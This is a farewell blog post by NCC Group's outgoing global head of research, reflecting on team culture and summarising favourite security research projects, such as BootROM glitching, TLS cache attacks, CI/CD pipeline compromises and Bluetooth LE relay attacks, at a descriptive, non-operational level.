After nearly four years into my role, I am stepping down as NCC Group’s SVP & Global Head of Research. In part just for myself, to reflect on a whirlwind few years, and in part as a thank you and celebration of all of the incredible researchers with whom I have had the privilege of working, I’m writing this post to share:
I am proud of what we have accomplished together. First of all, we survived a global pandemic and somehow managed to publish any security research at all, despite how profoundly this affected so many of us. And it amazes me to say that in fact, across a team of several hundred technical security consultants globally, we’ve published over 600 research publications (research papers, technical blog posts, technical advisories/CVEs, conference talks, and open-source tool releases) since 2019, including releasing well over 60 open-source security tools, and presenting around 150 conference presentations at venues including Black Hat USA, Shmoocon, ACM CCS, Hardwear.io, REcon, IEEE Security & Privacy, Appsec USA, Toorcon, Oracle Code One, BSidesLV, O’Reilly Artificial Intelligence, Chaos Communication Congress, Microsoft BlueHat, HITB Amsterdam, RSA Conference, Ekoparty, CanSecWest, the Linux Foundation Member Summit, DEF CON, and countless others. We won awards, served on advisory boards, hacked drones out of the sky, served on Review Boards of top venues including USENIX WOOT and Black Hat USA, and our research has been covered by media outlets around the world, including Wired, Forbes, The New York Times, Bloomberg, Ars Technica, Politico, DarkReading, Techcrunch, Fast Company, the Wall Street Journal, VICE, and hundreds of other mainstream and trade publications globally.
More importantly, we have:
Watched many researchers graduate from their time at NCC Group to do ever more amazing things, some of whom found their calling through performing their very first research projects within our research program
Patched countless vulnerabilities through collaboration with vendors, and sometimes from just writing the patches ourselves
Demonstrated the commercial viability of highly specialized security consulting practices driven forward ever further through an intense investment in R&D
Advocated and educated for a better (more secure, equitable, privacy-respecting) world through demonstrating the risks and defining the mitigations to critical problems in security & privacy, working with journalists including our numerous collaborations with Which?, and through related policy work like educating US Congressional staffers and testifying before UK Parliament
Supported countless researchers to get their first CVEs, publish their first blog posts, overcome fears, get onstage for the first time at Black Hat, and otherwise face the great unknown standing between themselves and their dreams
And I hope that it has been tremendously worthwhile.
Part 1: On leading a security research team
At NCC Group, our approach to security research has been and will continue to be, I think, somewhat unique within our industry. We do not have a small team of full-time researchers we invest in and put on display as evidence of the firm’s broader capability – rather, all of our researchers are seconded to research part-time from their consulting or internal development roles. We are all peers, where people doing their first-ever security research project have equal access to research time and other investment as do established, world-class researchers.
We deliberately resist the trope of the “brilliant asshole,” knowing full well that rockstar-ism and disrespect destroy the type of culture which enables the kind of intellectual risk-taking that security research requires. (Besides – the most talented people I’ve met in my career tend to also be the most humble and kind).
From my experiences over the past four years, here are a few other things I believe to be true:
Confidence is a skill. A lot of talent is lost to the world for want of a little courage, and sometimes a single comment or experience can change someone’s career forever. As leaders, the greatest gift we can give the people we manage is the skill of confidence – that is, the unshakable belief in someone that they can handle whatever challenges lay before them, and that they are in a safe enough environment that they know where to turn if they find themselves overwhelmed.
We all have an inner critic, but our inner critic is usually wrong. One of my most meaningful memories from my time in this role was at Black Hat/DEF CON/BSidesLV in 2019, where we had over 20 speakers from NCC Group presenting their research. Over half of those researchers confessed to me at some moment leading up to their talks, their feelings of self-doubt, insecurity, or fear. I was grateful to be that person for them, but heartbroken to hear so many talented people question the worth of their work, and sometimes even of themselves. Those speakers universally went on to give excellent talks that were well-received. The lessons here, I think, are both that (1) even the experienced speakers you admire at the best venues in the industry still have moments of imposter syndrome, and thus that, (2) our inner critic tends to be wrong and we should do our best to feel the fear and do things anyway.
We are better together. Nothing helps us workshop new ideas and dare to try difficult things like having a trusted community who can share their expertise, give a different perspective, and mentor each other to help us grow.
Elitist gatekeeping holds us all back. There are a number of things our industry needs to stop doing, and most of them are “gatekeeping.” Stop preventing interdisciplinary research and hackily attempting to reinvent other fields. Stop forgetting to give credit to those who did something before you, especially when those people aren’t yet well-known in our industry and it’s easiest to diminish their contributions. Stop making people feel more ashamed to ask a question than to pretend they know something they do not. Stop scaring away new contributors for not having achieved RCE before they started kindergarten. Stop blaming users for not being infosec professionals. Which brings me to my next point…..
Infosec is more meritocratic for some than others. While most of our industry is awesome, there are still people who assume their female peers or leaders are junior, non-technical, or from the Marketing department (which is also a gendered disservice to men in the Marketing department!). Underrepresented people continue to face a disproportionate amount of condescension and exclusion which in turn can make them less likely to submit their talks to CFPs, contribute to OSS, publish their research, or apply for jobs. This barrage of discouragement meaningfully affects individuals, and can even lead to their departure from our industry. Even if CVE allocation and tier-1 conference talk acceptances are agnostic to things like race and gender, the systemic and cultural obstacles edging underrepresented people out of our industry one unwelcoming conversation at a time are not. This needs to be acknowledged if we hope to change it.
Radical inclusivity breeds technical prowess. People do not take intellectual risks (or even ask questions) in environments in which they do not feel psychologically safe. By creating a deliberate culture of warmth, respect, and inclusion of all skill levels and backgrounds, we can take technical and intellectual risks together, view constructive feedback from others as a gift, experiment without necessarily coupling “failure” with “shame,” and accomplish things we’d otherwise dare not try.
Bold attempts should be rewarded. At NCC Group, we pay bonuses for achievement in research. For the last few years, we have had several different categories for “achievement,” and you only need to satisfy one of them to qualify for an award. One of the categories under which someone can qualify for one of these bonuses is, “Difficulty, Audacity, and Effort.” We know that trying something difficult is a risk with huge potential upside, but the downside is that it may fail. We have tried to help “own” that risk with our researchers by rewarding valiant efforts to do hard things, even when those things crash and burn. And I think, we’ve been better for it.
Part 2: A few of my favourite projects (2018-2022)
In the last few years we’ve published well over 600 research talks, blogs, papers, tools and advisories. You can read about every single thing we published in 2020 and 2021 in our corresponding Annual Research Reports. Some of the earlier work has through no fault of our own unfortunately been lost to the sands of time.
Here, I’ll just share a few (okay, more than a few) of my very favourite things from my time at NCC Group by a number of talented consultants and researchers, past and present. Admittedly, there have been a lot of great projects and this is at best a pseudorandom sample of fond memories. Most of the things below are research projects, but some of them are interesting initiatives we’ve worked on inside or outside NCC Group, not to mention our many publicly-reported security audits of critical software and hardware, and the creation and rapid growth of our Commercial Research division.
Assessing Unikernel Security (Spencer Michaels & Jeff Dileo, 2019) The “Infinite Jest” of unikernel security whitepapers, this 104-page monstrosity performed a necessary security deep-dive into unikernels – single-address-space machine images constructed by treating component applications and drivers like libraries and compiling them, along with a kernel and a thin OS layer, into a single binary blob. It challenged the idea that unikernels’ smaller codebases and lack of excess services necessarily imply security, demonstrating through study of the major unikernels Rumprun and IncludeOS that instead, everything old was new again, with now-canonical features like ASLR, W^X, stack canaries, heap integrity checks and more are either completely absent or seriously flawed. The authors furthermore reasoned that if an application running on such a system contains a memory corruption vulnerability, it is often possible for attackers to gain code execution, even in cases where the application’s source and binary are unknown, and worse yet noting that because the application and the kernel run together as a single process, an attacker who compromises a unikernel can immediately exploit functionality that would require privilege escalation on a regular OS, e.g. arbitrary packet I/O.
The 9 Lives of Bleichenbacher’s CAT: New Cache ATtacks on TLS Implementations (David Wong & external collaborators Eyal Ronen, Robert Gillham, Daniel Genkin, Adi Shamir, & Yuval Yarom, IEEE S&P 2019) This phenomenal paper showed that in the 20 years of earnest attempts at patching Bleichenbacher-style padding oracle attacks against RSA implementations of the PKCS #1 v1.5 standard, many are still vulnerable to leakage from novel microarchitectural side channels. In particular, they describe and demonstrate Cache-like ATtacks (CATs), enabling downgrade attacks against any TLS connection to a vulnerable server and recovering all the 2048 bits of the RSA plaintext, breaking the security of 7-out-of-9 popular implementations of TLS.
Practical Attacks on Machine Learning Systems(Chris Anley, 2022) This wide-ranging paper by NCC Group’s Chief Scientist, Chris Anley, discusses real-world attack classes possible on machine learning systems. In it, he reminds us that “models are code,” demonstrating vulnerabilities and attacks related to Python Pickle Files, PyTorch’s PT format and State Dictionary formats, a Keras H2 Lambda Layer Exploit, Tensorflow, and Apache MXNet, and to name a few. He also reproduces a number of existing results from the machine learning attack literature, and presents a taxonomy of attacks on machine learning systems including malicious models, data poisoning, adversarial perturbation, training data extraction, model stealing, “masterprints,” inference by covariance, DoS, and model repurposing. Critically, he reminds us that in addition to all of these novel attack types that are specific to AI/ML, traditional hacking techniques still work on these systems also – discussing the problems of credentials in code, dependency risks, and webapp vulnerabilities like SQL injection – of course, an evergreen topic for Chris 🙂
Unpacking .pkgs: A look inside MacOS installer packages (Andy Grant, DEF CON 27) In this work, Andy studied the inner workings of MacOS installer packages and demonstrated where serious security issues can arise, including his findings of a number of novel vulnerabilities and how they can be exploited to elevate privileges and gain code/command execution.
Co-founding the Open Source Security Foundation (Jennifer Fernick, 2020-present) In February 2020, a small group of us across the industry founded the Open Source Security Coalition, with the goal of bringing people from across our industry together to improve the security of the open source ecosystem in a collaborative way, enabling impact-prioritized investment of time and funding toward the most critical and impactful efforts to help secure OSS. In August 2020, this became OpenSSF and moved into its more well-resourced home within the Linux Foundation. Since then, we’ve advised Congressional staffers about supply chain security, which supported the greater work of OpenSSF at the White House Open Source Security Summit. Together with David Wheeler, I also had the privilege of presenting a 2021 Linux Foundation Member Summit Keynote on Securing Open Source Software, which can be viewed here, as well as a talk aimed at security researchers at BHUSA with Christopher Robinson. In May 2022, on the heels of the second OSS Security Summit in DC, we announced the Open Source Software Security Mobilization plan, a $150-million dollar 10-point plan to radically improve the security of open-source software. In this, I wrote both a proposal for Conducting Third-Party Code Reviews (& Remediation) of up to 200 of the Most-Critical OSS Components (Stream 7, pages 38-40) with Amir Montazery of OSTIF, as well as a proposal for a vendor-neutral Open Source Security Incident Response Team (now called OSS-SIRT, in Stream 5, pages 30-33) which is now being led by the inimitable CRob of Intel.
There’s A Hole In Your SoC: Glitching The MediaTek BootROM (Jeremy Boone & Ilya Zhuravlev, 2020) In this work, Jeremy & Ilya (who was, incredibly, an intern at the time) uncovered an unpatchable vulnerability in the MediaTek MT8163V system-on-a-chip (64-bit ARM Cortex-A), and were able to reliably glitch it to bypass signature verification of the preloader, circumventing all secure boot functionality thus completely breaking the hardware root of trust. What’s worse is they have reason to believe these affects other MediaTek chipsets due to a shared BootROM-to-preloader execution flow across them, likely implying that this vulnerability affects a wide variety of embedded devices such as tablets, smart phones, home networking products, and a range of IoT devices.
There’s Another Hole In Your SoC: Unisoc ROM Vulnerabilities(Ilya Zhuravlev, 2022) In this follow-up to Ilya’s previous work, he studied the security of the UNISOC platform’s boot chain, uncovering several unpatchable vulnerabilities in the BootROM which could persistently undermine secure boot. These vulnerabilities could even, for example, be exploited by malicious software which previously escalated its privileges in order to insert a persistent undetectable backdoor into the boot chain. These chips are used across many budget Android phones including some of the recent models produced by Samsung, Motorola and Nokia.
On Linux Random Number Generation(Thomas Pornin, 2019) Wherein Thomas made an unforgettable case for why monitoring entropy levels on Linux systems is not very useful.
Our research partnership with University College London Every year, as a part of our research partnership with UCL’s Centre for Doctoral Training in Data-Intensive Science, we work with a small group of high energy physics and astrophysics PhD students to apply machine learning to a domain-specific problem in cybersecurity. For example, in 2020, we explored deepfake capabilities and mitigation strategies. In 2021, we sought to understand the efficacy of various machine learning primitives for static malware analysis. In 2022, we challenged the students to study the effectiveness of using Generative Adversarial Networks (GANs) to improve fuzzing through preprocessing and other techniques (research paper forthcoming).
10 real-world stories of how we’ve compromised CI/CD pipelines(Aaron Haymore, Iain Smart, Viktor Gazdag, Divya Natesan, & Jennifer Fernick, 2022) We’ve long believed that “CI/CD pipelines are execution engines.” In the past 5 years, we’ve demonstrated countless supply chain attacks in production CI/CD pipelines for virtually every company we’ve tested, with several dozen successful compromises of targets ranging from small businesses to Fortune 500 companies across almost every market and industry. In this blog post we shared 10 diverse examples of ways we’ve compromised development pipelines in real-world engagements with NCC Group clients, with hopes to illuminate the criticality of securing CI/CD pipelines amid our industry’s broader focus on supply-chain security. This blog post was expanded into a talk for BHUSA 2022, “RCE-as-a-Service: Lessons Learned from 5 Years of Real-World CI/CD Pipeline Compromise”
Sleight of ARM: Demystifying Intel Houdini (Brian Hong, BHUSA 2021) In this work, Brian reverse engineered Intel’s proprietary Houdini binary translator which runs ARM binaries on x86, demonstrating security weaknesses it introduces into processes using it, showing the capability to do things like execute arbitrary ARM and x86, and write targeted malware that bypasses existing platform analysis for platforms used by hundreds of millions.
Finally releasing the long-awaited whitepaper for TriforceAFL (Tim Newsham & Jesse Hertz, 2017) Better late than never! Six years ago, Tim Newsham and Jesse Hertz released TriforceAFL – an extension of the American Fuzzy Lop (AFL) fuzzer which supports full-system fuzzing using QEMU – but unfortunately the associated whitepaper for this work was never published. We did some archaeology around NCC and were happy to be able to release the associated paper a few months ago.
MacOS vulns including CVE-2020-9817 (Andy Grant, 2019-2020) Andy found both privesc bug in the macOS installer enabling arbitrary code execution with root privileges, effectively leading to a full system compromise. He also disclosed CVE-2020-3882, a bug in macOS enabling an attacker to retrieve semi-arbitrary files from a target victim’s macOS system using only a calendar invite, giving me an excellent excuse to never take a call again (or like, until patching) from my friend Andy Grant 🙂
Solitude: A privacy analysis tool (Dan Hastings & Emanuel Flores, Chaos Communication Congress 2020) After showing at DEF CON in 2019 that many mobile apps’ privacy policies are lying to us about the data they collect, Dan Hastings was worried about how users who are not themselves security researchers could better understand the privacy risks of the mobile apps. Solitude was created with those users in mind – specifically, this open source privacy analysis tool was created to empower users to conduct their own privacy investigations into where their private data goes once it leaves their web browser or mobile device, and is broadly extensible and configurable to study a wide range of data types across arbitrary mobile applications. This work was also presented to key end-user communities such as activists, journalists, and others at the human rights conference, RightsCon.
On the malicious use of large language models like GPT-3(Jennifer Fernick, 2021) This blogpost explored the theoretical question of whether (and how) large language models like GPT-3 or their successors may be useful for exploit generation, and proposed an offensive security research agenda for large language models, based on a converging mix of existing experimental findings about privacy, learned examples, security, multimodal abstraction, and generativity (of novel output, including code) by large language models including GPT-3.
Critical vulnerabilities in a prominent OSS cryptography libraries(Paul Bottinnelli, 2021) Paul uncovered critical vulnerabilities enabling arbitrary signature forgery of ECDSA signatures in several open-source cryptography libraries – one with over 7.3M downloads in the previous 90 days on PyPI, and over 16,000 weekly downloads on npm.
Command and KubeCTL: Real-World Kubernetes Security for Pentesters (Mark Manning, Shmoocon 2020) In this talk and corresponding blog post, Mark explored Kubernetes offensive security across a spectrum of security postures and environments, demonstrating flaws and risks in each – those without regard to security, those with incomplete threat models, and seemingly well-secured clusters. This was a part of a larger body of work by Mark that made significant contributions to the security of k8s.
Wubes: Leveraging the Windows 10 Sandbox for Arbitrary Processes(Cedric Halbronn, 2021) Leveraging the Windows Sandbox, Cedric created a Qubes-like containerization for Microsoft Windows, enabling you to spawn applications in isolation. This means that if you browse a malicious site using Wubes, it won’t be able to infect your Windows host without additional chained exploits. Specifically, this means attackers need 1, 2, 3 and 4 below instead of just 1 and 2 in the case of Firefox:
1) Browser remote code execution (RCE) exploit 2) Local privilege exploit (LPE) 3) Bypass of Code Integrity (CI) 4) HyperV (HV) elevation of privilege (EoP)
Coinbugs: Enumerating Common Blockchain Implementation-Level Vulnerabilities (Aleksandar Kircanski & Terence Tarvis, 2020) This paper sought to offer an overview of the various classes of implementation-level security flaws that commonly arise in proof-of-work blockchains, studying the vulnerabilities found during the first decade of Bitcoin’s existence, with the dual-purpose of both offering a roadmap for security testers performing blockchain security reviews, as well as a reference for blockchain developers on common pitfalls. It enumerated 10 classes of blockchain-specific software flaws, introducing several novel bug classes alongside known examples in production blockchains.
Rich Warren’s vulnerabilities in Pulse Connect Secureand Sonicwall (2020-2021) Rich Warren and David Cash initially published multiple vulnerabilities in Pulse Connect Secure VPN appliances including an arbitrary file read vulnerability (CVE-2020-8255), an injection vulnerability which can be exploited by an authenticated administrative user to execute arbitrary code as root (CVE-2020-8243), and an uncontrolled gzip extraction vulnerability to overwrite arbitrary files, resulting in RCE as root (CVE-2020-8260). Rich later found that this patch could be bypassed, resulting yet again in RCE (CVE-2021-22937). He later published a series of 6advisoriesrelatedtotheSonicWall SMA 100 Series, yet again demonstrating systemic vulnerabilities in highly privileged network appliances. This seems to be a theme in our industry, and is highly concerning given major supply chain attack events on similar highly-privileged and ubiquitous network appliances in recent years. I believe it is essential that we continue to dig deeper into the security limitations of these types of devices.
F5 Networks Big IP threat intelligence(Research & Intelligence Fusion Team, July 2020) In this work, NCC Group’s RIFT team (led by folks including Ollie Whitehouse & Christo Butcher) published initial analysis of active exploitation NCC had observed of the CVSS 10.0, F5 Networks TMUI RCE vulnerability (CVE-2020-5902) allowing arbitrary, active interception of any traffic traversing an internet-exposed, unpatched Big-IP node, initially being used by threat actors to execute code, and later being involving staged exploitation, web shells, and were able to bypass mitigation attempts, including gaining creds, privkeys, TLS certificates to load balancers and more. Here is the Wired piece initially discussing this threat intel.
Breaking a class of binary obfuscation technologies(Nicolas Guigo, 2021) In this work Nico revealed tools and methods for reversing real-world binary obfuscation, effectively breaking one of the canonical mobile app obfuscation tools and demonstrating that the protections offered by obfuscation tools are probably orders-of-magnitude fewer person-hours for attackers to break than our industry tends to assume. (Bonus points to Nico for sending me his epic initial demo for this set to Eric Prydz’ “Opus”)
Hardware-Backed Heist: Extracting ECDSA Keys from Qualcomm’s TrustZone(Keegan Ryan, ACM CCS 2019) This paper showed the susceptibility of TrustZone to sidechannel attacks allowing an attacker to gain insight into the microarchitectural behaviour of trusted code. Specifically, it demonstrated a series of novel vulnerabilities that leak sensitive cryptographic information through shared microarchitectural structures in Qualcomm’s implementation of Android’s hardware-backed keystore, allowing an attacker to extract sensitive information and fully recover a 256-bit ECDSA private key.
Popping Locks, Stealing Cars, and Breaking a Billion Other Things: Bluetooth LE Link Layer Relay Attacks(Sultan Qasim Khan, Hardwear.io NL 2022) The mainstream headline for this was something like, “we hacked a Tesla and drove away,” but the real headline was that Sultan created the long-hypothesized but yet-unproven world’s first link-layer relay attack on Bluetooth Low Energy, due to the nature of the attack itself even bypassing most existing relay attack mitigations. This story was originally published by Bloomberg but ended up covered by over 900 media outlets worldwide. The advisories for Tesla and BLE are here. This work reminds us that the use of technologies/protocols/standards for security purposes for which they were not designed can be dangerous.
Hacking in Space(2022-2023) Okay, so, this is just a teaser for future work. Keep an eye on this, umm, space 🚀
Conclusion & greets
It feels so strange to say goodbye – we haven’t even released “Symphony of Shellcode” yet 😮
I’m forever grateful to Dave Goldsmith, Nick Rowe, and Ollie Whitehouse for taking a chance on me and allowing me the unreal opportunity to lead such an esteemed technical team, and for the friendship and contributions of them and of many other technical leaders (past* and present) across NCC Group – not least, NCC Group’s Commercial Research Director and former UK/EU/APAC Research Director Matt Lewis, as well as Jeff Dileo, Jeremy Boone, Will Groesbeck, Kevin Dunn, Ian Robertson, Damian Archer*, Rob Wood, Javed Samuel, Chris Anley, Nick Dunn, Robert Seacord*, Richard Appleby, Timur Duehr, Daniel Romero, Iain Smart, Clint Gibler*, Spencer Michaels*, Drew Suarez*, Joel St John*, Ray Lai*, and Bob Wessen* – as well as our program coordinators Aaron Haymore* and R. Rivera, and the dozens (real talk: hundreds) of talented consultants with whom I’ve had the tremendous privilege of working. Thank you for justifying simultaneously both my deep existential fear that everything is hackable, and my hope that there are so many bright, ethically-minded people using all of their power to make things safer and more secure for us all.